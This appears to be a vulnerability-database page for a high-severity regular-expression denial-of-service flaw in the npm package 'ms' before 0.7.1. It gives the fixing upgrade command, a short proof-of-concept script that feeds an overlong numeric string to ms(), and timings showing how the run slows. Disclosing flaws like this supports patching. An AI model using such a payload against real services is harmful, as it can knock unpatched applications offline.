VDB
Sign up
HIGH7.5

GHSA-3fx5-fwvr-xrjg

Regular Expression Denial of Service in ms

Quick fix

GHSA-3fx5-fwvr-xrjg — ms: upgrade to the fixed version with the command below.

npm install ms@0.7.1

Details

Versions of `ms` prior to 0.7.1 are affected by a regular expression denial of service vulnerability when extremely long version strings are parsed.

## Proof of Concept ```javascript var ms = require('ms'); var genstr = function (len, chr) { var result = ""; for (i=0; i<=len; i++) { result = result + chr; }

return result; }

ms(genstr(process.argv[2], "5") + " minutea");

```

### Results Showing increase in execution time based on the input string. ``` $ time node ms.js 10000

real 0m0.758s user 0m0.724s sys 0m0.031s

$ time node ms.js 20000

real 0m2.580s user 0m2.494s sys 0m0.047s

$ time node ms.js 30000

real 0m5.747s user 0m5.483s sys 0m0.080s

$ time node ms.js 80000

real 0m41.022s user 0m38.894s sys 0m0.529s ```

Are you affected?

Enter the version of the package you're using.

Affected packages

npm/ms
Introduced in: 0Fixed in: 0.7.1
Fixnpm install ms@0.7.1

References